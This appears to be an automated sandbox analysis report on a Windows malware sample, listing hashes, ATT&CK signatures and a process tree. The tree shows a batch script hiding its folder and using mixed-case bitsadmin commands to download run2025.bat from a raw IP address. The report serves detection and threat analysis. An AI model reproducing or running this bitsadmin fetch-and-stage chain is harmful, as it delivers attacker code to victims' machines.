Analysis

  • max time kernel
    13s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2024 14:05

General

  • Target

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe

  • Size

    126KB

  • MD5

    b2dc0f8a36a7e450b11149a8e15ca964

  • SHA1

    27fd3d24a969b5b0528b69f1cbd8b293e74a6809

  • SHA256

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15

  • SHA512

    135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933

  • SSDEEP

    1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
    "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t26049.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2936
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2940
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /crEaTe pls
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2948
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2096
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2976
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /ResUme pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1964
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2988
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2696
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /CompLete pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3032
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2800
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2944
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ytmp\t26049.bat

    Filesize

    2KB

    MD5

    c63068e2c14568d2561d4350a38a6475

    SHA1

    141406945974b7a7be1d908a035a8ccb88efa1a0

    SHA256

    9729a6b5370e1ea53546f0a4331cbf83441eb409d1ab1393501421204dbfcbd8

    SHA512

    fc67084b7cd7003b0375fed2931c96645fdaabc70593fbaa3f0920943d9f4454c727025b386c9866b729bbbf0c45c5708f082c08bec2cbbe38a8b157b03498d0